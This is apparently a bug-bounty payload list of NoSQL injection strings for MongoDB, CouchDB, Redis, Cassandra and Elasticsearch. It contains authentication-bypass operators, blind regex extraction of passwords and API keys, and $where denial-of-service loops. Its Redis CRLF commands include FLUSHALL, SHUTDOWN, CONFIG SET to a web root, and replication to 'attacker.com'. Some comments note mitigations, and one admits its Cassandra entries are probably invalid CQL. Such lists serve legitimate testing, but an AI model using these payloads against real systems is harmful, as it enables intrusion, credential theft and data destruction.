hunting/NoSQL-Injection/nosql-injection-payloads.txt
# NoSQL Injection Payloads (2020-2025 Bug Bounty Tested)
# ============================
# MongoDB Injection Payloads
# ============================
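# Authentication Bypass - JSON Format
# (These depend on the application passing a parsed JSON object, rather than a string, into the query filter; requiring credential fields to be strings before the query is built rejects the whole group.)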
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
{"username": "admin", "password": {"$ne": ""}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$in": ["admin", "administrator", "root"]}, "password": {"$ne": ""}}
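# Authentication Bypass - URL Encoded (form/query-string bracket notation)
# (The bracketed keys become operator objects only when the server's parser expands them into nested objects; a string-type check on each credential field rejects them.)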
username[$ne]=null&password[$ne]=null
username[$ne]=&password[$ne]=
username[$gt]=&password[$gt]=
username[$regex]=.*&password[$regex]=.*
username=admin&password[$ne]=
username=admin&password[$gt]=
username[$nin][]=&password[$ne]=
username[$exists]=true&password[$exists]=true
# MongoDB Operators Injection
{"$where": "sleep(5000)"}
{"$where": "this.password == 'admin'"}
{"username": {"$regex": "^admin"}}
{"username": {"$regex": "admin.*"}}
{"email": {"$regex": ".*@domain\\.com$"}}
{"role": {"$in": ["admin", "superuser"]}}
{"age": {"$gt": 0}}
{"price": {"$lt": 9999}}
{"status": {"$ne": "inactive"}}
{"verified": {"$eq": true}}
# Time-Based NoSQL Injection (MongoDB)
{"$where": "sleep(5000) || true"}
{"username": {"$regex": "^a"}, "$where": "sleep(5000)"}
';sleep(5000);'
';return true;var x='
{"username": "admin", "$where": "sleep(5000)"}
# Data Extraction - MongoDB
{"username": {"$regex": "^a"}}
{"username": {"$regex": "^ad"}}
{"username": {"$regex": "^adm"}}
{"username": {"$regex": "^admi"}}
{"username": {"$regex": "^admin"}}
{"password": {"$regex": "^[a-z]"}}
{"apiKey": {"$regex": "^.*"}}
# Boolean-Based MongoDB Injection
{"username": "admin", "password": {"$ne": "wrong"}}
{"$or": [{"username": "admin"}, {"email": "admin@test.com"}]}
{"$and": [{"username": {"$exists": true}}, {"password": {"$exists": true}}]}
{"$nor": [{"banned": true}, {"deleted": true}]}
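# MongoDB Command Injection (query modifiers and operators: these annotate or alter a find query; none of them executes a database command)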
{"username": "admin", "$comment": "test"}
{"username": "admin", "$hint": "username_1"}
{"$orderby": {"username": 1}}
{"username": {"$type": 2}}
{"username": {"$size": 5}}
# MongoDB Operator Abuse
{"username": {"$all": ["admin"]}}
{"roles": {"$elemMatch": {"role": "admin"}}}
{"metadata": {"$exists": false}}
{"settings": {"$nin": ["disabled"]}}
# Advanced MongoDB Injection (2023-2025)
{"username": {"$expr": {"$eq": ["$username", "admin"]}}}
{"$expr": {"$gt": [{"$strLenCP": "$password"}, 0]}}
{"username": {"$jsonSchema": {}}}
{"username": "admin'; return true; var a='"}
{"username": "admin\"; return true; var a=\""}
# ============================
# CouchDB Injection Payloads
# ============================
# CouchDB View Manipulation
startkey="admin"&endkey="admin\ufff0"
startkey=["admin"]&endkey=["admin", {}]
key="admin"
keys=["admin","root","administrator"]
# CouchDB Query Injection
{"selector": {"username": {"$eq": "admin"}}}
{"selector": {"$or": [{"username": "admin"}, {"role": "admin"}]}}
{"selector": {"password": {"$gt": null}}}
{"selector": {"_id": {"$gte": null}}}
# CouchDB Mango Query Injection
{"selector": {"$and": [{"username": {"$exists": true}}, {"password": {"$exists": true}}]}}
{"selector": {"username": {"$regex": "(?i)admin"}}}
{"selector": {"email": {"$regex": ".*@.*"}}}
# ============================
# Redis Injection Payloads
# ============================
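# Redis Command Injection
# (CR/LF sequences carried in a value that the application concatenates into the Redis command stream; clients that send every argument as a length-prefixed RESP bulk string treat these bytes as data.)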
\n\r\nSET key value\r\n
\n\r\nFLUSHALL\r\n
\n\r\nGET password\r\n
\n\r\nKEYS *\r\n
\n\r\nCONFIG GET *\r\n
\n\r\nCONFIG SET dir /var/www/html\r\n
\n\r\nSAVE\r\n
\n\r\nSHUTDOWN\r\n
\n\r\nSLAVEOF attacker.com 6379\r\n
# Redis Protocol Injection
*1\r\n$8\r\nFLUSHALL\r\n
*1\r\n$4\r\nKEYS\r\n$1\r\n*\r\n
*2\r\n$3\r\nGET\r\n$3\r\nkey\r\n
*3\r\n$3\r\nSET\r\n$4\r\ntest\r\n$5\r\nvalue\r\n
# Redis Lua Injection
EVAL "return redis.call('GET', 'password')" 0
EVAL "return redis.call('KEYS', '*')" 0
EVAL "redis.call('SET', 'hacked', 'true')" 0
# ============================
# Cassandra Injection Payloads
# ============================
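# Cassandra CQL Injection
# (NOTE(review): these are SQL-style strings; CQL has no UNION or subqueries and, as far as I know, no OR in WHERE clauses — confirm against the deployed version. Bound parameters in prepared statements keep such input out of the query text.)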
' OR '1'='1
admin' --
admin' /*
' ALLOW FILTERING --
' AND token(id) > token(' union select * from users --')
# ============================
# Elasticsearch Injection
# ============================
# Elasticsearch Query Injection
{"query": {"match_all": {}}}
{"query": {"wildcard": {"username": "*"}}}
{"query": {"regexp": {"password": ".*"}}}
{"query": {"prefix": {"apikey": ""}}}
{"query": {"bool": {"must_not": {"term": {"role": "guest"}}}}}
# Elasticsearch Script Injection (Groovy/Painless)
{"script": {"source": "doc['password'].value"}}
{"query": {"script_score": {"query": {"match_all": {}}, "script": {"source": "Math.random()"}}}}
# Elasticsearch Aggregation Injection
{"aggs": {"passwords": {"terms": {"field": "password", "size": 1000}}}}
{"aggs": {"users": {"terms": {"field": "username.keyword"}}}}
# ============================
# Generic NoSQL Injection
# ============================
# Array Injection
username[]=admin&password[]=password
username[$gt]=&password[$gt]=
{"username": ["$ne", null], "password": ["$ne", null]}
# Type Confusion
username=admin&password=true
username=admin&password=1
{"username": "admin", "password": true}
{"username": "admin", "password": 1}
# Null Byte Injection
admin%00
admin\x00
{"username": "admin\u0000"}
# Comment Injection
admin' // comment
admin' /* comment */
{"username": "admin' // ", "password": "pass"}
# Encoding Bypasses
{"username": {"$ne": "\u0000"}}
{"username": {"$regex": "\x2e\x2a"}}
# ============================
# Authentication Bypass Combinations (High Success Rate 2020-2025)
# ============================
# JSON POST Body
{"username": "admin", "password": {"$ne": null}}
{"username": {"$in": ["admin", "administrator"]}, "password": {"$exists": true}}
{"$or": [{"username": "admin"}, {"username": "administrator"}], "password": {"$gt": ""}}
{"username": "admin", "password": {"$regex": "^.*"}}
# URL Parameters
?username[$ne]=fake&password[$ne]=fake
?username=admin&password[$gt]=
?username[$regex]=admin&password[$ne]=fake
?username[$in][]=admin&password[$exists]=true
# Cookie Values
username=admin; password[$ne]=fake
session={"username":{"$ne":null},"password":{"$ne":null}}
# HTTP Headers
X-Username: admin
X-Password: {"$ne": ""}
Authorization: {"username": {"$ne": null}}
# ============================
# Advanced Data Extraction Techniques
# ============================
# Character-by-Character Extraction
{"username": {"$regex": "^a.*"}}
{"username": {"$regex": "^ad.*"}}
{"username": {"$regex": "^adm.*"}}
# Length-Based Extraction
{"password": {"$regex": "^.{8}$"}}
{"password": {"$regex": "^.{1,100}$"}}
# Character Set Testing
{"password": {"$regex": "^[a-z].*"}}
{"password": {"$regex": "^[A-Z].*"}}
{"password": {"$regex": "^[0-9].*"}}
# ============================
# Blind NoSQL Injection
# ============================
# Time-Based
{"$where": "sleep(5000)"}
{"$where": "this.username == 'admin' && sleep(5000)"}
{"username": "admin", "$where": "sleep(5000) || true"}
# Boolean-Based
{"username": "admin", "password": {"$regex": "^a"}}
{"username": "admin", "password": {"$regex": "^b"}}
# ============================
# NoSQL Injection Payloads for APIs
# ============================
# GraphQL-style NoSQL Injection
{"filter": {"username": {"$ne": null}}}
{"where": {"password": {"$exists": true}}}
{"match": {"role": "admin"}}
# REST API Query Parameters
?filter[username][$ne]=fake
?where[password][$exists]=true
?sort[role][$eq]=admin
# ============================
# Polyglot NoSQL Injection
# ============================
' || '1'=='1' || {"$ne":""}
admin' || true || {"$ne": null}
{"$ne": null} || '1'='1
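# ============================
# Denial of Service (DoS) Payloads
# ============================
# (The first two depend on `$where` JavaScript evaluation; the third is a nested-quantifier regex that backtracks catastrophically. Rejecting client-supplied `$where` and `$regex` operators removes both.)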
{"$where": "while(true){}"}
{"$where": "for(var i=0;i<99999999;i++){}"}
{"username": {"$regex": "^((((((((((a+)+)+)+)+)+)+)+)+)+)$"}}
# ============================
# Modern Framework-Specific Injections (2023-2025)
# ============================
# Express.js/Node.js
req.body.username[$ne]=null
req.query.password[$gt]=
req.cookies.user[$exists]=true
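# Django MongoDB (keyword-style `field__operator` lookups, presumably MongoEngine-style; the entries mix JSON `null` with the Python literal `True`)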
{"username__ne": null, "password__ne": null}
{"username__regex": "admin"}
{"password__exists": True}
# PHP MongoDB
array("username" => array('$ne' => null))
array("password" => array('$gt' => ""))
# Python (PyMongo)
{"username": {"$ne": None}, "password": {"$ne": None}}
{"username": {"$regex": ".*admin.*", "$options": "i"}}
# ============================
# WAF/Filter Bypass Techniques
# ============================
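# Unicode Bypass (JSON `\uNNNN` escapes in keys are decoded by the parser, so operator filtering has to run on the parsed keys rather than on the raw request body)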
{"username": {"$\u006Ee": null}}
{"username": {"\u0024ne": null}}
# Case Variation
{"username": {"$Ne": null}}
{"username": {"$NE": null}}
# Spacing/Formatting
{"username":{"$ne":null}}
{ "username" : { "$ne" : null } }
{"username" : {"$ne" : null}}
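# Prototype Pollution (JavaScript `__proto__` / `constructor.prototype` keys; an object-merge issue in the application layer rather than a database query operator)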
{"__proto__": {"admin": true}}
{"constructor": {"prototype": {"admin": true}}}
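# ============================
# Server-Side JavaScript Injection (SSJI)
# ============================
# (These need server-side JavaScript evaluation, e.g. MongoDB `$where`; setting `security.javascriptEnabled: false` in the mongod configuration disables it.)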
'; return true; var dummy='
"; return true; var dummy="
'; var ret = this; return ret; var dummy='
{"$where": "function() { return true; }"}
{"$where": "obj.credits - obj.price > 0"}